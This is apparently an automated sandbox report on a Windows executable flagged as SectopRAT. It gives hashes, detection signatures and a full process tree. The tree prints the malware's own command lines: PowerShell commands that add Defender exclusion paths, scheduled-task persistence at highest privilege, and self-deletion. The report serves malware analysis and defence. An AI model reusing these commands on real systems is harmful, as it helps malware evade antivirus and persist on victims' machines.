Analysis

max time kernel: 148s
max time network: 148s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 06/04/2024, 20:40
Static task: static1
Behavioral task: behavioral1
Sample: e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe
Resource: win7-20240221-en
General

Target: e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe
Size: 2.3MB
MD5: e33e3d1648bd9a98fc3875c1eb376889
SHA1: b684d4ea15479d2a09448d59d5aa6db5d666b012
SHA256: 8be67974b71de6b2a70585cf81fe0d6a5cf67e9c03a667834e4a177e210ab500
SHA512: 0948ffad6846adcf67700430d6dea1370f7948fa65fe3a17e391b4f2f49ce5cf262fec5226011d2951268142c3ee4f60ceb8d050052ed0a6f10e042d7cbb6153
SSDEEP: 49152:A+mKqRWCKBA8N/7dtgQxmapsprT03R/zu7uEI:A7ReBxNLgkXp6w5zEuV
Malware Config

Signatures

SectopRAT payload (16 IoCs)
Executes dropped EXE (6 IoCs)
pid | Process
1968 | etc.exe
2788 | build.exe
1676 | svchost32.exe
2244 | services32.exe
1780 | svchost32.exe
1688 | sihost32.exe
Loads dropped DLL (6 IoCs)
pid | Process
2512 | e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe
2512 | e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe
2312 | cmd.exe
1676 | svchost32.exe
1292 | cmd.exe
1780 | svchost32.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow | ioc
15 | raw.githubusercontent.com
16 | raw.githubusercontent.com
Drops file in System32 directory (7 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | svchost32.exe
File created | C:\Windows\system32\services32.exe | svchost32.exe
File opened for modification | C:\Windows\system32\services32.exe | svchost32.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (16 IoCs)
pid | Process
2788 | build.exe (all 16 entries are identical)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2100 | schtasks.exe
2524 | schtasks.exe
Modifies system certificate store
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | svchost32.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value not present on page] | svchost32.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value not present on page] | svchost32.exe
Suspicious behavior: EnumeratesProcesses (10 IoCs)
pid | Process
2580 | powershell.exe
2436 | powershell.exe
1700 | powershell.exe
2616 | powershell.exe
1676 | svchost32.exe
788 | powershell.exe
1996 | powershell.exe
2136 | powershell.exe
1652 | powershell.exe
1780 | svchost32.exe
Suspicious use of AdjustPrivilegeToken (11 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2580 | powershell.exe
Token: SeDebugPrivilege | 2788 | build.exe
Token: SeDebugPrivilege | 2436 | powershell.exe
Token: SeDebugPrivilege | 1700 | powershell.exe
Token: SeDebugPrivilege | 2616 | powershell.exe
Token: SeDebugPrivilege | 1676 | svchost32.exe
Token: SeDebugPrivilege | 788 | powershell.exe
Token: SeDebugPrivilege | 1996 | powershell.exe
Token: SeDebugPrivilege | 2136 | powershell.exe
Token: SeDebugPrivilege | 1652 | powershell.exe
Token: SeDebugPrivilege | 1780 | svchost32.exe
Suspicious use of SetWindowsHookEx (1 IoCs)
pid | Process
2788 | build.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe  (depth 1, PID 2512)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\e33e3d1648bd9a98fc3875c1eb376889_JaffaCakes118.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Roaming\etc.exe  (depth 2, PID 1968)
    cmdline: C:\Users\Admin\AppData\Roaming\etc.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe  (depth 3, PID 2668)
      cmdline: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 4, PID 2580)
        cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 4, PID 2436)
        cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 4, PID 1700)
        cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 4, PID 2616)
        cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\cmd.exe  (depth 3, PID 2312)
      cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Roaming\etc.exe"
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Local\Temp\svchost32.exe  (depth 4, PID 1676)
        cmdline: C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Roaming\etc.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\System32\cmd.exe  (depth 5, PID 1216)
          cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\schtasks.exe  (depth 6, PID 2100)
            cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
            - Creates scheduled task(s)

        C:\Windows\system32\services32.exe  (depth 5, PID 2244)
          cmdline: "C:\Windows\system32\services32.exe"
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\cmd.exe  (depth 6, PID 376)
            cmdline: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
            - Suspicious use of WriteProcessMemory

            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 7, PID 788)
              cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
              - Drops file in System32 directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 7, PID 1996)
              cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
              - Drops file in System32 directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 7, PID 2136)
              cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
              - Drops file in System32 directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 7, PID 1652)
              cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
              - Drops file in System32 directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

          C:\Windows\System32\cmd.exe  (depth 6, PID 1292)
            cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
            - Loads dropped DLL

            C:\Users\Admin\AppData\Local\Temp\svchost32.exe  (depth 7, PID 1780)
              cmdline: C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Drops file in System32 directory
              - Modifies system certificate store
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

              C:\Windows\System32\cmd.exe  (depth 8, PID 1320)
                cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit

                C:\Windows\system32\schtasks.exe  (depth 9, PID 2524)
                  cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                  - Creates scheduled task(s)

              C:\Windows\system32\Microsoft\Telemetry\sihost32.exe  (depth 8, PID 1688)
                cmdline: "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                - Executes dropped EXE

              C:\Windows\System32\cmd.exe  (depth 8, PID 2276)
                cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"

                C:\Windows\system32\choice.exe  (depth 9, PID 3028)
                  cmdline: choice /C Y /N /D Y /T 3

        C:\Windows\System32\cmd.exe  (depth 5, PID 2820)
          cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\choice.exe  (depth 6, PID 2824)
            cmdline: choice /C Y /N /D Y /T 3

  C:\Users\Admin\AppData\Roaming\build.exe  (depth 2, PID 2788)
    cmdline: C:\Users\Admin\AppData\Roaming\build.exe
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads